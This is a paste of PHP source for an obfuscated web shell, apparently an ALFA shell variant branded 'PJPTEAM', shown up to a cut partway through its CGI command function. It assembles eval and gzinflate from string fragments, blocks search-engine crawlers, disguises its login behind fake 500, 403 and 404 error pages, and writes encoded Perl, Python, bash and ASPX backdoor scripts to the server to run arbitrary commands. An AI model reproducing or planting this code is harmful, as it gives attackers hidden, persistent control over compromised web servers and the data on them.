Untitled


SUBMITTED BY: Guest

DATE: Aug. 30, 2024, 8:20 a.m.

FORMAT: Text only

SIZE: 462.6 kB

HITS: 102

  1. <?php
  2. $GLOBALS['PJPTEAM'] = array(
  3. 'username' => 'admin',
  4. 'password' => '0ce1a66e00367662854dfa5a78857a08',
  5. 'safe_mode' => '0',
  6. 'login_page' => 'gui',
  7. 'show_icons' => '1',
  8. 'post_encryption' => true,
  9. 'cgi_api' => true,
  10. );
  11. $Love = 'fu' . 'n' . 'ct' . 'ion_' . 'e' . 'xist' . 's';
  12. $Hope = 'cha' . 'r' . 'C' . 'o' . 'd' . 'e' . 'A' . 't' . '';
  13. $Destiny = 'e' . 'v' . 'al';
  14. $Purpose = 'gz' . 'inf' . 'late';
  15. if (!$Love('b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . ''))
  16. {
  17. function vcnvSCZgBz($data)
  18. {
  19. if (empty($data)) return;
  20. $b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
  21. $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
  22. $ac = 0;
  23. $enc = '';
  24. $tmp_arr = array();
  25. if (!$data)
  26. {
  27. return $data;
  28. }
  29. do
  30. {
  31. $o1 = $Hope($data, $i++);
  32. $o2 = $Hope($data, $i++);
  33. $o3 = $Hope($data, $i++);
  34. $bits = $o1 << 16 | $o2 << 8 | $o3;
  35. $h1 = $bits >> 18 & 0x3f;
  36. $h2 = $bits >> 12 & 0x3f;
  37. $h3 = $bits >> 6 & 0x3f;
  38. $h4 = $bits & 0x3f;
  39. $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4);
  40. }
  41. while ($i < strlen($data));
  42. $enc = implode($tmp_arr, '');
  43. $r = (strlen($data) % 3);
  44. return ($r ? substr($enc, 0, ($r - 3)) : $enc) . substr('===', ($r || 3));
  45. }
  46. function charCodeAt($data, $char)
  47. {
  48. return ord(substr($data, $char, 1));
  49. }
  50. function charAt($data, $char)
  51. {
  52. return substr($data, $char, 1);
  53. }
  54. }
  55. else
  56. {
  57. function vcnvSCZgBz($s)
  58. {
  59. $b = 'b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . '';
  60. return $b($s);
  61. }
  62. }
  63. if (!$Love('b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . ''))
  64. {
  65. function zRtSHsbTzV($input)
  66. {
  67. if (empty($input)) return;
  68. $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
  69. $chr1 = $chr2 = $chr3 = "";
  70. $enc1 = $enc2 = $enc3 = $enc4 = "";
  71. $i = 0;
  72. $output = "";
  73. $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
  74. do
  75. {
  76. $enc1 = strpos($keyStr, substr($input, $i++, 1));
  77. $enc2 = strpos($keyStr, substr($input, $i++, 1));
  78. $enc3 = strpos($keyStr, substr($input, $i++, 1));
  79. $enc4 = strpos($keyStr, substr($input, $i++, 1));
  80. $chr1 = ($enc1 << 2) | ($enc2 >> 4);
  81. $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
  82. $chr3 = (($enc3 & 3) << 6) | $enc4;
  83. $output = $output . chr((int)$chr1);
  84. if ($enc3 != 64)
  85. {
  86. $output = $output . chr((int)$chr2);
  87. }
  88. if ($enc4 != 64)
  89. {
  90. $output = $output . chr((int)$chr3);
  91. }
  92. $chr1 = $chr2 = $chr3 = "";
  93. $enc1 = $enc2 = $enc3 = $enc4 = "";
  94. }
  95. while ($i < strlen($input));
  96. return $output;
  97. }
  98. }
  99. else
  100. {
  101. function zRtSHsbTzV($s)
  102. {
  103. $b = 'b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . '';
  104. return $b($s);
  105. }
  106. }
  107. function __ZW5jb2Rlcg($s)
  108. {
  109. return vcnvSCZgBz($s);
  110. }
  111. function __ZGVjb2Rlcg($s)
  112. {
  113. return zRtSHsbTzV($s);
  114. }
  115. $GLOBALS['DB_NAME'] = $GLOBALS['PJPTEAM'];
  116. foreach ($GLOBALS['DB_NAME'] as $key => $value)
  117. {
  118. $prefix = substr($key, 0, 2);
  119. if ($prefix == "us")
  120. {
  121. $GLOBALS['DB_NAME']["user"] = $value;
  122. $GLOBALS['DB_NAME']["user_rand"] = $key;
  123. }
  124. elseif ($prefix == "pa")
  125. {
  126. $GLOBALS['DB_NAME']["pass"] = $value;
  127. $GLOBALS['DB_NAME']["pass_rand"] = $key;
  128. }
  129. elseif ($prefix == "sa")
  130. {
  131. $GLOBALS['DB_NAME']["safemode"] = $value;
  132. $GLOBALS['DB_NAME']["safemode_rand"] = $key;
  133. }
  134. elseif ($prefix == "lo")
  135. {
  136. $GLOBALS['DB_NAME']["login_page"] = $value;
  137. $GLOBALS['DB_NAME']["login_page_rand"] = $key;
  138. }
  139. elseif ($prefix == "sh")
  140. {
  141. $GLOBALS['DB_NAME']["show_icons"] = $value;
  142. $GLOBALS['DB_NAME']["show_icons_rand"] = $key;
  143. }
  144. elseif ($prefix == "po")
  145. {
  146. $GLOBALS['DB_NAME']["post_encryption"] = $value;
  147. $GLOBALS['DB_NAME']["post_encryption_rand"] = $key;
  148. }
  149. elseif ($prefix == "cg")
  150. {
  151. $GLOBALS['DB_NAME']["cgi_api"] = $value;
  152. $GLOBALS['DB_NAME']["cgi_api_rand"] = $key;
  153. }
  154. }
  155. unset($GLOBALS['PJPTEAM']);
  156. if (!isset($_SERVER["HTTP_HOST"])) exit();
  157. if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
  158. if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
  159. if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
  160. if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
  161. if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
  162. if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
  163. if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
  164. define("__ALFA_VERSION__", "4.1");
  165. define("__ALFA_UPDATE__", "2");
  166. define("__ALFA_CODE_NAME__", "Delves");
  167. define("__ALFA_DATA_FOLDER__", "SEO-PJP");
  168. define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));
  169. define("__ALFA_SECRET_KEY__", __ALFA_POST_ENCRYPTION__?_AlfaSecretKey():'');
  170. $GLOBALS['__ALFA_COLOR__'] = array(
  171. "shell_border" => array(
  172. "key_color" => "#0E304A",
  173. "multi_selector" => array(
  174. ".header" => "border: 7px solid {color}",
  175. "#meunlist" => "border-color: {color}",
  176. "#hidden_sh" => "background-color: {color}",
  177. ".ajaxarea" => "border: 1px solid {color}",
  178. ".foot" => "border-color: {color}",
  179. )
  180. ),
  181. "header_vars" => "#FFFFFF",
  182. "header_values" => "#FFD700",
  183. "header_on" => "#00FF00",
  184. "header_off" => "#ff0000",
  185. "header_none" => "#00FF00",
  186. "home_shell" => "#ff0000",
  187. "home_shell:hover" => array(
  188. "key_color" => "#FFFFFF",
  189. "multi_selector" => array(
  190. ".home_shell:hover" => "color: {color};",
  191. )
  192. ),
  193. "back_shell" => "#efbe73",
  194. "back_shell:hover" => array(
  195. "key_color" => "#FFFFFF",
  196. "multi_selector" => array(
  197. ".back_shell:hover" => "color: {color};",
  198. )
  199. ),
  200. "header_pwd" => "#00FF00",
  201. "header_pwd:hover" => array(
  202. "key_color" => "#FFFFFF",
  203. "multi_selector" => array(
  204. ".header_pwd:hover" => "color: {color};",
  205. )
  206. ),
  207. "header_drive" => "#00FF00",
  208. "header_drive:hover" => array(
  209. "key_color" => "#FFFFFF",
  210. "multi_selector" => array(
  211. ".header_drive:hover" => "color: {color};",
  212. )
  213. ),
  214. "header_show_all" => "#00FF00",
  215. "disable_functions" => "#ff0000",
  216. "footer_text" => "#27979B",
  217. "menu_options" => "#FFD700",
  218. "menu_options:hover" => array(
  219. "key_color" => "#646464",
  220. "multi_selector" => array(
  221. ".menu_options:hover" => "background-color: {color};font-weight: unset;",
  222. )
  223. ),
  224. "options_list" => array(
  225. "key_color" => "#00FF00",
  226. "multi_selector" => array(
  227. ".content_options_holder .header center a" => "color: {color};",
  228. )
  229. ),
  230. "options_list:hover" => array(
  231. "key_color" => "#FFFFFF",
  232. "multi_selector" => array(
  233. ".content_options_holder .header center a:hover" => "color: {color};",
  234. )
  235. ),
  236. "options_list_header" => array(
  237. "key_color" => "#59cc33",
  238. "multi_selector" => array(
  239. ".txtfont_header" => "color: {color};",
  240. )
  241. ),
  242. "options_list_text" => array(
  243. "key_color" => "#FFFFFF",
  244. "multi_selector" => array(
  245. ".txtfont,.tbltxt" => "color: {color};",
  246. )
  247. ),
  248. "Alfa+" => array(
  249. "key_color" => "#06ff0f",
  250. "multi_selector" => array(
  251. ".alfa_plus" => "color: {color};font-weight: unset;",
  252. )
  253. ),
  254. "hidden_shell_text" => array(
  255. "key_color" => "#00FF00","multi_selector" => array(
  256. "#hidden_sh a" => "color: {color};",
  257. )
  258. ),
  259. "hidden_shell_version" => "#ff0000",
  260. "shell_name" => "#FF0000",
  261. "main_row:hover" => array(
  262. "key_color" => "#646464",
  263. "multi_selector" => array(
  264. ".main tr:hover" => "background-color: {color};",
  265. )
  266. ),
  267. "main_header" => array(
  268. "key_color" => "#FFFFFF",
  269. "multi_selector" => array(
  270. ".main th" => "color: {color};",
  271. )
  272. ),
  273. "main_name" => array(
  274. "key_color" => "#FFFFFF",
  275. "multi_selector" => array(
  276. ".main .main_name" => "color: {color};font-weight: unset;",
  277. )
  278. ),
  279. "main_size" => "#FFD700",
  280. "main_modify" => "#FFD700",
  281. "main_owner_group" => "#FFD700",
  282. "main_green_perm" => "#25ff00",
  283. "main_red_perm" => "#FF0000",
  284. "main_white_perm" => "#FFFFFF",
  285. "beetween_perms" => "#FFFFFF",
  286. "main_actions" => array(
  287. "key_color" => "#FFFFFF",
  288. "multi_selector" => array(
  289. ".main .actions" => "color: {color};",
  290. )
  291. ),
  292. "menu_options:hover" => array(
  293. "key_color" => "#646464",
  294. "multi_selector" => array(
  295. ".menu_options:hover" => "background-color: {color};font-weight: unset;",
  296. )
  297. ),
  298. "minimize_editor_background" => array(
  299. "key_color" => "#0e304a",
  300. "multi_selector" => array(
  301. ".minimized-wrapper" => "background-color: {color};",
  302. )
  303. ),
  304. "minimize_editor_text" => array(
  305. "key_color" => "#f5deb3",
  306. "multi_selector" => array(
  307. ".minimized-text" => "color: {color};",
  308. )
  309. ),
  310. "editor_border" => array(
  311. "key_color" => "#0e304a",
  312. "multi_selector" => array(
  313. ".editor-explorer,.editor-modal" => "border: 2px solid {color};",
  314. )
  315. ),
  316. "editor_background" => array(
  317. "key_color" => "rgba(0, 1, 23, 0.94)",
  318. "multi_selector" => array(
  319. ".editor-explorer,.editor-modal" => "background-color: {color};",
  320. )
  321. ),
  322. "editor_header_background" => array(
  323. "key_color" => "rgba(21, 66, 88, 0.93)",
  324. "multi_selector" => array(
  325. ".editor-header" => "background-color: {color};",
  326. )
  327. ),
  328. "editor_header_text" => array(
  329. "key_color" => "#00ff7f",
  330. "multi_selector" => array(
  331. ".editor-path" => "color: {color};",
  332. )
  333. ),
  334. "editor_header_button" => array(
  335. "key_color" => "#1d5673",
  336. "multi_selector" => array(
  337. ".close-button, .editor-minimize" => "background-color: {color};",
  338. )
  339. ),
  340. "editor_actions" => array(
  341. "key_color" => "#FFFFFF",
  342. "multi_selector" => array(
  343. ".editor_actions" => "color: {color};",
  344. )
  345. ),
  346. "editor_file_info_vars" => array(
  347. "key_color" => "#FFFFFF",
  348. "multi_selector" => array(
  349. ".editor_file_info_vars" => "color: {color};",
  350. )
  351. ),
  352. "editor_file_info_values" => array(
  353. "key_color" => "#67ABDF",
  354. "multi_selector" => array(
  355. ".filestools" => "color: {color};",
  356. )
  357. ),
  358. "editor_history_header" => array(
  359. "key_color" => "#14ff07",
  360. "multi_selector" => array(
  361. ".hheader-text,.history-clear" => "color: {color};",
  362. )
  363. ),
  364. "editor_history_list" => array(
  365. "key_color" => "#03b3a3",
  366. "multi_selector" => array(
  367. ".editor-file-name" => "color: {color};",
  368. )
  369. ),
  370. "editor_history_selected_file" => array(
  371. "key_color" => "rgba(49, 55, 93, 0.77)",
  372. "multi_selector" => array(
  373. ".is_active" => "background-color: {color};",
  374. )
  375. ),
  376. "editor_history_file:hover" => array(
  377. "key_color" => "#646464",
  378. "multi_selector" => array(
  379. ".file-holder > .history:hover" => "background-color: {color};",
  380. )
  381. ),
  382. "input_box_border" => array(
  383. "key_color" => "#0E304A",
  384. "multi_selector" => array(
  385. "input[type=text],textarea" => "border: 1px solid {color}",
  386. )
  387. ),
  388. "input_box_text" => array(
  389. "key_color" => "#999999",
  390. "multi_selector" => array(
  391. "input[type=text],textarea" => "color: {color};",
  392. )
  393. ),
  394. "input_box:hover" => array(
  395. "key_color" => "#27979B",
  396. "multi_selector" => array(
  397. "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  398. )
  399. ),
  400. "select_box_border" => array(
  401. "key_color" => "#0E304A",
  402. "multi_selector" => array(
  403. "select" => "border: 1px solid {color}",
  404. )
  405. ),
  406. "select_box_text" => array(
  407. "key_color" => "#FFFFEE",
  408. "multi_selector" => array(
  409. "select" => "color: {color};",
  410. )
  411. ),
  412. "select_box:hover" => array(
  413. "key_color" => "#27979B",
  414. "multi_selector" => array(
  415. "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  416. )
  417. ),
  418. "button_border" => array(
  419. "key_color" => "#27979B",
  420. "multi_selector" => array(
  421. "input[type=submit],.button,#addup" => "border: 1px solid {color};",
  422. )
  423. ),
  424. "button:hover" => array(
  425. "key_color" => "#27979B",
  426. "multi_selector" => array(
  427. "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",
  428. ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  429. )
  430. ),
  431. "outputs_text" => array(
  432. "key_color" => "#67ABDF",
  433. "multi_selector" => array(
  434. ".ml1" => "color: {color};",
  435. )
  436. ),
  437. "outputs_border" => array(
  438. "key_color" => "#0E304A",
  439. "multi_selector" => array(
  440. ".ml1" => "border: 1px solid {color};",
  441. )
  442. ),
  443. "uploader_border" => array(
  444. "key_color" => "#0E304A",
  445. "multi_selector" => array(
  446. ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  447. )
  448. ),
  449. "uploader_background" => array(
  450. "key_color" => "#0E304A",
  451. "multi_selector" => array(
  452. ".inputfile strong" => "background-color: {color};",
  453. )
  454. ),
  455. "uploader_text_right" => array(
  456. "key_color" => "#FFFFFF",
  457. "multi_selector" => array(
  458. ".inputfile strong" => "color: {color};",
  459. )
  460. ),
  461. "uploader_text_left" => array(
  462. "key_color" => "#25ff00",
  463. "multi_selector" => array(
  464. ".inputfile span" => "color: {color};",
  465. )
  466. ),
  467. "uploader:hover" => array(
  468. "key_color" => "#27979B",
  469. "multi_selector" => array(
  470. ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  471. )
  472. ),
  473. "uploader_progress_bar" => array(
  474. "key_color" => "#00ff00",
  475. "multi_selector" => array(
  476. ".up_bar" => "background-color: {color};",
  477. )
  478. ),
  479. "mysql_tables" => "#00FF00",
  480. "mysql_table_count" => "#67ABDF",
  481. "copyright" => "#dfff00",
  482. "scrollbar" => array(
  483. "key_color" => "#67ABDF",
  484. "multi_selector" => array(
  485. "*::-webkit-scrollbar-thumb" => "background-color: {color};",
  486. )
  487. ),
  488. "scrollbar_background" => array(
  489. "key_color" => "#000115",
  490. "multi_selector" => array(
  491. "*::-webkit-scrollbar-track" => "background-color: {color};",
  492. )
  493. ),
  494. );
  495. $GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
  496. $config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
  497. @session_write_close();
  498. @ignore_user_abort(true);
  499. @set_time_limit(0);
  500. @ini_set('memory_limit', '-1');
  501. @ini_set("upload_max_filesize", "9999m");
  502. if($config['AlfaProtectShell']){
  503. $SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");
  504. $Eform='<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
  505. if($config['AlfaLoginPage'] == 'gui'){
  506. if(@$_COOKIE["AlfaUser"] != $config['AlfaUser'] && $_COOKIE["AlfaPass"] != md5($config['AlfaPass'])){
  507. if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){
  508. __alfa_set_cookie("AlfaUser", $config['AlfaUser']);
  509. __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
  510. @header('location: '.$_SERVER["PHP_SELF"]);
  511. }
  512. echo '
  513. <style>
  514. body{background: black;}
  515. loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
  516. loginbox td { border-radius:5px; font-size:11px; }
  517. </style>
  518. <title>.: Haxor Tesla :.</title><center>
  519. <center><img style="border-radius:100px;"width="500" height="250" alt="PJPTEAM Perfect Hunter" draggable="false" src="https://i.imgur.com/7aRsK2p.png" /></center>
  520. <div id=loginbox><p><font face="DejaVu Sans" size=-1>
  521. <center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
  522. <tr><td bgcolor="gold"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="black" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="Georgia"><b>PJPTEAM Perfect Hunter</b></font></th></tr>
  523. <tr><td bgcolor="black" style="padding:5">
  524. <form method="post">
  525. <input type="hidden" name="action" value="login">
  526. <input type="hidden" name="hide" value="">
  527. <center><table>
  528. <tr><td><font color="white" face="DejaVu Sans" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder=" " onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
  529. <tr><td><font color="white" face="DejaVu Sans" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder=" " onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
  530. <tr><td><font face="DejaVu Sans" size=-1>&nbsp;</font></td><td><font face="DejaVu Sans" size=-1><input type="submit" value="Login"></font></td></tr></table>
  531. </div><br /></center>';
  532. exit;
  533. }
  534. }elseif($config['AlfaLoginPage']=='500'){
  535. if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
  536. if(@md5($_POST["password"])==$config['AlfaPass']){
  537. __alfa_set_cookie("AlfaUser", $config['AlfaUser']);
  538. __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
  539. @header('location: '.$_SERVER["PHP_SELF"]);
  540. }
  541. echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>'.$SERVER_SIG.'</body></html>'.$Eform;
  542. exit;
  543. }
  544. }elseif($config['AlfaLoginPage']=='403'){
  545. if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
  546. if(@md5($_POST["password"])==$config['AlfaPass']){
  547. __alfa_set_cookie("AlfaUser", $config['AlfaUser']);
  548. __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
  549. @header('location: '.$_SERVER["PHP_SELF"]);
  550. }
  551. echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
  552. exit;
  553. }
  554. }elseif($config['AlfaLoginPage']=='404'){
  555. if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
  556. if(@md5($_POST["password"])==$config['AlfaPass']){
  557. __alfa_set_cookie("AlfaUser", $config['AlfaUser']);
  558. __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
  559. @header('location: '.$_SERVER["PHP_SELF"]);
  560. }
  561. echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
  562. exit;
  563. }
  564. }
  565. }
  566. function decrypt_post($str){
  567. if(__ALFA_POST_ENCRYPTION__){
  568. $pwd = __ALFA_SECRET_KEY__;
  569. $pwd = __ZW5jb2Rlcg($pwd);
  570. $str = __ZGVjb2Rlcg($str);
  571. $enc_chr = "";
  572. $enc_str = "";
  573. $i = 0;
  574. while ($i < strlen($str)) {
  575. for ($j = 0; $j < strlen($pwd); $j++) {
  576. $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
  577. $enc_str .= $enc_chr;
  578. $i++;
  579. if ($i >= strlen($str))
  580. break;
  581. }
  582. }
  583. return __ZGVjb2Rlcg($enc_str);
  584. }else{
  585. return __ZGVjb2Rlcg($str);
  586. }
  587. }
  588. function _AlfaSecretKey(){
  589. $secret = @$_COOKIE["AlfaSecretKey"];
  590. if(!isset($_COOKIE["AlfaSecretKey"])){
  591. $secret = uniqid(mt_rand(), true);
  592. __alfa_set_cookie("AlfaSecretKey", $secret);
  593. }
  594. return $secret;
  595. }
  596. function alfa_getColor($target){
  597. if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){
  598. return $GLOBALS["DB_NAME"]["color"][$target];
  599. }else{
  600. $target = $GLOBALS["__ALFA_COLOR__"][$target];
  601. if(is_array($target)){
  602. return $target["key_color"];
  603. }else{
  604. return $target;
  605. }
  606. }
  607. }
  608. function alfaCssLoadColors(){
  609. $css = "";
  610. foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
  611. if(!is_array($value)){
  612. $value = alfa_getColor($key);
  613. $css .= ".{$key}{color: {$value};}";
  614. }else{
  615. if(isset($value["multi_selector"])){
  616. foreach($value["multi_selector"] as $k => $v){
  617. $color = alfa_getColor($key);
  618. $code = str_replace("{color}", $color, $v);
  619. $css .= $k."{".$code."}";
  620. }
  621. }
  622. }
  623. }
  624. return $css;
  625. }
  626. if(isset($_POST['ajax'])){
  627. function AlfaNum(){
  628. $args = func_get_args();
  629. $alfax = array();
  630. $find = array();
  631. for($i=1;$i<=10;$i++){
  632. $alfax[] = $i;
  633. }
  634. foreach($args as $arg){
  635. $find[] = $arg;
  636. }
  637. echo '<script>';
  638. foreach($alfax as $alfa){
  639. if(in_array($alfa,$find))
  640. continue;
  641. echo 'alfa'.$alfa."_=";
  642. }
  643. echo '""</script>';
  644. }}
  645. function _alfa_cgicmd($cmd,$lang="perl",$set_cookie=false){
  646. if(!$GLOBALS["DB_NAME"]["cgi_api"]){
  647. return "";
  648. }
  649. if(isset($_COOKIE["haxorcgiapi_mode"])){
  650. return "";
  651. }
  652. $cmd_pure = $cmd;
  653. $is_curl = function_exists('curl_version');
  654. $is_socket = function_exists('fsockopen');
  655. if($is_curl||$is_socket){
  656. $recreate = false;
  657. if(isset($_COOKIE["haxorcgiapi"])){
  658. if(!@file_exists("haxorcgiapi/".$_COOKIE["haxorcgiapi"].".haxor")){
  659. $recreate = true;
  660. $lang = $_COOKIE["haxorcgiapi"];
  661. }
  662. }
  663. if(!isset($_COOKIE["haxorcgiapi"])||$recreate){
  664. @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
  665. $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
  666. $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
  667. $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
  668. $aspx = "jZNda9swFIavk18hNAoOAXdsozdLyrrUKYaRlriNN0IuFPvEFbUl70jOB2P97T1SPBo8ynZlS+d53/Ph49HZF3YnCmDfhCoaehnzyTvOIiXWJSwk7BIrLF1uRGmAs7PL/ogUcVVrtGwmKjC1yCieHIyFKkxhHT7E7jHRyqIuzb8111IUShsrs/+A41vPENTvGYtSFSyrcjZmc/jZgLHhVGO15HTHV59fkUfInv6G3K3H5CZokTHj6cfZdn2z+CC+z+of1b7cVNOdWLwf88Gvfq+3PlhYrlgurCDDtipqdgtIvqirr8LAxafEJw6ojgH59441tvQ97G14lUziOFKZzok7nsIbsK3O2ZOQlHeoMzCG1aRXsGPtOfC2dUifB22sNjqcINCXmulUqlzviLbYQBeayhLcUCnsZhTCHniXucKiqUBZ46DzjHE2dDPuYg8Gkkcoy2gPWWOdo9+RLjaHXCJk1JhQucD8trF1Y98orwtHiBrfYFONTzSqay/QePDVnjYTHAfYroD+k9dHT0qhpCK/15HKgwF1+hr2yU+jzntO+6iVgTBFaSHgS6NL2Eoj6Xd5FrVcjWqESz48phvy0bk/O+3vPi3uCw==";
  669. if($lang=="perl")$source= $perl;elseif($lang=="py")$source = $py;else $source = $bash;
  670. if($lang == "aspx"){
  671. alfaWriteTocgiapi("aspx.aspx",$aspx);
  672. }else{
  673. alfaWriteTocgiapi($lang.".haxor",$source);
  674. }
  675. alfacgihtaccess('cgi', "haxorcgiapi/");
  676. }else{
  677. $lang = $_COOKIE["haxorcgiapi"];
  678. }
  679. $cgi_ext = ".haxor";
  680. if($lang=="aspx"){
  681. $cgi_ext = ".aspx";
  682. }
  683. $cgi_url = __ALFA_DATA_FOLDER__."/haxorcgiapi/".$lang.$cgi_ext;
  684. $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd);
  685. if($is_curl){
